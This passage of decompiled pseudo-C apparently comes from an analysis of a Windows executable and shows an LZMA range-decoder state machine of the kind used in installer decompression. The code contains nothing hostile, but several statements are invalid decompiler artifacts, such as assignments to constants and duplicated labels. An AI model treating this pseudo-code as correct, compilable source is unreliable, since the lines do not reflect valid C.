                                  												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                  												 *(_t613 - 8) = _t534;
                                  												if(_t534 == 0) {
                                  													goto L171;
                                  												} else {
                                  													goto L20;
                                  												}
                                  											case 2:
                                  												L24:
                                  												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                  												 *(_t613 - 0x84) = 6;
                                  												 *(_t613 - 0x4c) = _t553;
                                  												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                  												L132:
                                  												 *(_t613 - 0x54) = _t606;
                                  												goto L133;
                                  											case 3:
                                  												L21:
                                  												__eflags =  *(_t613 - 0x6c);
                                  												if( *(_t613 - 0x6c) == 0) {
                                  													 *(_t613 - 0x88) = 3;
                                  													goto L170;
                                  												}
                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  												_t67 = _t613 - 0x70;
                                  												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                  												__eflags =  *_t67;
                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  												L23:
                                  												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                  												if( *(_t613 - 0x48) != 0) {
                                  													goto L21;
                                  												}
                                  												goto L24;
                                  											case 4:
                                  												L133:
                                  												_t531 =  *_t606;
                                  												_t589 = _t531 & 0x0000ffff;
                                  												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  												if( *(_t613 - 0xc) >= _t565) {
                                  													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  													 *(_t613 - 0x40) = 1;
                                  													_t532 = _t531 - (_t531 >> 5);
                                  													 *_t606 = _t532;
                                  												} else {
                                  													 *(_t613 - 0x10) = _t565;
                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                  												}
                                  												if( *(_t613 - 0x10) >= 0x1000000) {
                                  													goto L139;
                                  												}
                                  											case 5:
                                  												goto L137;
                                  											case 6:
                                  												__edx = 0;
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x34) = 1;
                                  													 *(__ebp - 0x84) = 7;
                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  													while(1) {
                                  														L132:
                                  														 *(_t613 - 0x54) = _t606;
                                  														goto L133;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  												__esi =  *(__ebp - 0x60);
                                  												__cl = 8;
                                  												__cl = 8 -  *(__ebp - 0x3c);
                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  												__ecx =  *(__ebp - 0x3c);
                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  												__ecx =  *(__ebp - 4);
                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  												__eflags =  *(__ebp - 0x38) - 4;
                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  												if( *(__ebp - 0x38) >= 4) {
                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                  													if( *(__ebp - 0x38) >= 0xa) {
                                  														_t98 = __ebp - 0x38;
                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                  														__eflags =  *_t98;
                                  													} else {
                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  													}
                                  												} else {
                                  													 *(__ebp - 0x38) = 0;
                                  												}
                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                  												if( *(__ebp - 0x34) == __edx) {
                                  													__ebx = 0;
                                  													__ebx = 1;
                                  													goto L61;
                                  												} else {
                                  													__eax =  *(__ebp - 0x14);
                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  													__eflags = __eax -  *(__ebp - 0x74);
                                  													if(__eax >=  *(__ebp - 0x74)) {
                                  														__eax = __eax +  *(__ebp - 0x74);
                                  														__eflags = __eax;
                                  													}
                                  													__ecx =  *(__ebp - 8);
                                  													__ebx = 0;
                                  													__ebx = 1;
                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  													goto L41;
                                  												}
                                  											case 7:
                                  												__eflags =  *(__ebp - 0x40) - 1;
                                  												if( *(__ebp - 0x40) != 1) {
                                  													__eax =  *(__ebp - 0x24);
                                  													 *(__ebp - 0x80) = 0x16;
                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  													__eax =  *(__ebp - 0x28);
                                  													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  													__eax =  *(__ebp - 0x2c);
                                  													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  													__eax = 0;
                                  													__eflags =  *(__ebp - 0x38) - 7;
                                  													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  													__al = __al & 0x000000fd;
                                  													__eax = (__eflags >= 0) - 1 + 0xa;
                                  													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  													__eax =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 4) + 0x664;
                                  													__eflags = __eax;
                                  													 *(__ebp - 0x58) = __eax;
                                  													goto L69;
                                  												}
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 8;
                                  												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  												while(1) {
                                  													L132:
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											case 8:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x84) = 0xa;
                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  												} else {
                                  													__eax =  *(__ebp - 0x38);
                                  													__ecx =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                  													 *(__ebp - 0x84) = 9;
                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  												}
                                  												while(1) {
                                  													L132:
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											case 9:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													goto L89;
                                  												}
                                  												__eflags =  *(__ebp - 0x60);
                                  												if( *(__ebp - 0x60) == 0) {
                                  													goto L171;
                                  												}
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                  												__eflags = _t259;
                                  												0 | _t259 = _t259 + _t259 + 9;
                                  												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                  												goto L76;
                                  											case 0xa:
                                  												goto L0;
                                  											case 0xb:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__ecx =  *(__ebp - 0x24);
                                  													__eax =  *(__ebp - 0x20);
                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												} else {
                                  													__eax =  *(__ebp - 0x24);
                                  												}
                                  												__ecx =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												goto L88;
                                  											case 0xc:
                                  												L99:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xc;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t334 = __ebp - 0x70;
                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t334;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												__eax =  *(__ebp - 0x2c);
                                  												goto L101;
                                  											case 0xd:
                                  												L37:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xd;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t122 = __ebp - 0x70;
                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t122;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L39:
                                  												__eax =  *(__ebp - 0x40);
                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  													goto L48;
                                  												}
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													goto L54;
                                  												}
                                  												L41:
                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  												 *(__ebp - 0x48) = __eax;
                                  												__eax = __eax + 1;
                                  												__eax = __eax << 8;
                                  												__eax = __eax + __ebx;
                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edx = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													 *(__ebp - 0x40) = 1;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													__ebx = __ebx + __ebx + 1;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edx;
                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L39;
                                  												} else {
                                  													goto L37;
                                  												}
                                  											case 0xe:
                                  												L46:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xe;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t156 = __ebp - 0x70;
                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t156;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												while(1) {
                                  													L48:
                                  													__eflags = __ebx - 0x100;
                                  													if(__ebx >= 0x100) {
                                  														break;
                                  													}
                                  													__eax =  *(__ebp - 0x58);
                                  													__edx = __ebx + __ebx;
                                  													__ecx =  *(__ebp - 0x10);
                                  													__esi = __edx + __eax;
                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                  													__ax =  *__esi;
                                  													 *(__ebp - 0x54) = __esi;
                                  													__edi = __ax & 0x0000ffff;
                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                  													if( *(__ebp - 0xc) >= __ecx) {
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  														__cx = __ax;
                                  														_t170 = __edx + 1; // 0x1
                                  														__ebx = _t170;
                                  														__cx = __ax >> 5;
                                  														__eflags = __eax;
                                  														 *__esi = __ax;
                                  													} else {
                                  														 *(__ebp - 0x10) = __ecx;
                                  														0x800 = 0x800 - __edi;
                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  														__ebx = __ebx + __ebx;
                                  														 *__esi = __cx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													 *(__ebp - 0x44) = __ebx;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														continue;
                                  													} else {
                                  														goto L46;
                                  													}
                                  												}
                                  												L54:
                                  												_t173 = __ebp - 0x34;
                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  												__eflags =  *_t173;
                                  												goto L55;
                                  											case 0xf:
                                  												L58:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xf;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t203 = __ebp - 0x70;
                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t203;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L60:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													L55:
                                  													__al =  *(__ebp - 0x44);
                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  													goto L56;
                                  												}
                                  												L61:
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t217 = __edx + 1; // 0x1
                                  													__ebx = _t217;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L60;
                                  												} else {
                                  													goto L58;
                                  												}
                                  											case 0x10:
                                  												L109:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0x10;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t365 = __ebp - 0x70;
                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t365;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												goto L111;
                                  											case 0x11:
                                  												goto L69;
                                  											case 0x12:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 0x58);
                                  													 *(__ebp - 0x84) = 0x13;
                                  													__esi =  *(__ebp - 0x58) + 2;
                                  													while(1) {
                                  														L132:
                                  														 *(_t613 - 0x54) = _t606;
                                  														goto L133;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x4c);
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax =  *(__ebp - 0x4c) << 4;
                                  												__eflags = __eax;
                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                  												goto L130;
                                  											case 0x13:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													_t469 = __ebp - 0x58;
                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  													__eflags =  *_t469;
                                  													 *(__ebp - 0x30) = 0x10;
                                  													 *(__ebp - 0x40) = 8;
                                  													L144:
                                  													 *(__ebp - 0x7c) = 0x14;
                                  													goto L145;
                                  												}
                                  												__eax =  *(__ebp - 0x4c);
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax =  *(__ebp - 0x4c) << 4;
                                  												 *(__ebp - 0x30) = 8;
                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  												L130:
                                  												 *(__ebp - 0x58) = __eax;
                                  												 *(__ebp - 0x40) = 3;
                                  												goto L144;
                                  											case 0x14:
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  												__eax =  *(__ebp - 0x80);
                                  												 *(_t613 - 0x88) = _t533;
                                  												goto L1;
                                  											case 0x15:
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  												goto L120;
                                  											case 0x16:
                                  												__eax =  *(__ebp - 0x30);
                                  												__eflags = __eax - 4;
                                  												if(__eax >= 4) {
                                  													_push(3);
                                  													_pop(__eax);
                                  												}
                                  												__ecx =  *(__ebp - 4);
                                  												 *(__ebp - 0x40) = 6;
                                  												__eax = __eax << 7;
                                  												 *(__ebp - 0x7c) = 0x19;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L145;
                                  											case 0x17:
                                  												L145:
                                  												__eax =  *(__ebp - 0x40);
                                  												 *(__ebp - 0x50) = 1;
                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  												goto L149;
                                  											case 0x18:
                                  												L146:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0x18;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t484 = __ebp - 0x70;
                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t484;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L148:
                                  												_t487 = __ebp - 0x48;
                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                  												__eflags =  *_t487;
                                  												L149:
                                  												__eflags =  *(__ebp - 0x48);
                                  												if( *(__ebp - 0x48) <= 0) {
                                  													__ecx =  *(__ebp - 0x40);
                                  													__ebx =  *(__ebp - 0x50);
                                  													0 = 1;
                                  													__eax = 1 << __cl;
                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  													__eax =  *(__ebp - 0x7c);
                                  													 *(__ebp - 0x44) = __ebx;
                                  													while(1) {
                                  														 *(_t613 - 0x88) = _t533;
                                  														goto L1;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x50);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  												__eax =  *(__ebp - 0x58);
                                  												__esi = __edx + __eax;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__ax =  *__esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													__cx = __ax >> 5;
                                  													__eax = __eax - __ecx;
                                  													__edx = __edx + 1;
                                  													__eflags = __edx;
                                  													 *__esi = __ax;
                                  													 *(__ebp - 0x50) = __edx;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L148;
                                  												} else {
                                  													goto L146;
                                  												}
                                  											case 0x19:
                                  												__eflags = __ebx - 4;
                                  												if(__ebx < 4) {
                                  													 *(__ebp - 0x2c) = __ebx;
                                  													L119:
                                  													_t393 = __ebp - 0x2c;
                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                  													__eflags =  *_t393;
                                  													L120:
                                  													__eax =  *(__ebp - 0x2c);
                                  													__eflags = __eax;
                                  													if(__eax == 0) {
                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  														goto L170;
                                  													}
                                  													__eflags = __eax -  *(__ebp - 0x60);
                                  													if(__eax >  *(__ebp - 0x60)) {
                                  														goto L171;
                                  													}
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  													__eax =  *(__ebp - 0x30);
                                  													_t400 = __ebp - 0x60;
                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  													__eflags =  *_t400;
                                  													goto L123;
                                  												}
                                  												__ecx = __ebx;
                                  												__eax = __ebx;
                                  												__ecx = __ebx >> 1;
                                  												__eax = __ebx & 0x00000001;
                                  												__ecx = (__ebx >> 1) - 1;
                                  												__al = __al | 0x00000002;
                                  												__eax = (__ebx & 0x00000001) << __cl;
                                  												__eflags = __ebx - 0xe;
                                  												 *(__ebp - 0x2c) = __eax;
                                  												if(__ebx >= 0xe) {
                                  													__ebx = 0;
                                  													 *(__ebp - 0x48) = __ecx;
                                  													L102:
                                  													__eflags =  *(__ebp - 0x48);
                                  													if( *(__ebp - 0x48) <= 0) {
                                  														__eax = __eax + __ebx;
                                  														 *(__ebp - 0x40) = 4;
                                  														 *(__ebp - 0x2c) = __eax;
                                  														__eax =  *(__ebp - 4);
                                  														__eax =  *(__ebp - 4) + 0x644;
                                  														__eflags = __eax;
                                  														L108:
                                  														__ebx = 0;
                                  														 *(__ebp - 0x58) = __eax;
                                  														 *(__ebp - 0x50) = 1;
                                  														 *(__ebp - 0x44) = 0;
                                  														 *(__ebp - 0x48) = 0;
                                  														L112:
                                  														__eax =  *(__ebp - 0x40);
                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  															_t391 = __ebp - 0x2c;
                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  															__eflags =  *_t391;
                                  															goto L119;
                                  														}
                                  														__eax =  *(__ebp - 0x50);
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  														__eax =  *(__ebp - 0x58);
                                  														__esi = __edi + __eax;
                                  														 *(__ebp - 0x54) = __esi;
                                  														__ax =  *__esi;
                                  														__ecx = __ax & 0x0000ffff;
                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                  														if( *(__ebp - 0xc) >= __edx) {
                                  															__ecx = 0;
                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  															__ecx = 1;
                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  															__ebx = 1;
                                  															__ecx =  *(__ebp - 0x48);
                                  															__ebx = 1 << __cl;
                                  															__ecx = 1 << __cl;
                                  															__ebx =  *(__ebp - 0x44);
                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                  															__cx = __ax;
                                  															__cx = __ax >> 5;
                                  															__eax = __eax - __ecx;
                                  															__edi = __edi + 1;
                                  															__eflags = __edi;
                                  															 *(__ebp - 0x44) = __ebx;
                                  															 *__esi = __ax;
                                  															 *(__ebp - 0x50) = __edi;
                                  														} else {
                                  															 *(__ebp - 0x10) = __edx;
                                  															0x800 = 0x800 - __ecx;
                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  															 *__esi = __dx;
                                  														}
                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                  															L111:
                                  															_t368 = __ebp - 0x48;
                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                  															__eflags =  *_t368;
                                  															goto L112;
                                  														} else {
                                  															goto L109;
                                  														}
                                  													}
                                  													__ecx =  *(__ebp - 0xc);
                                  													__ebx = __ebx + __ebx;
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  													 *(__ebp - 0x44) = __ebx;
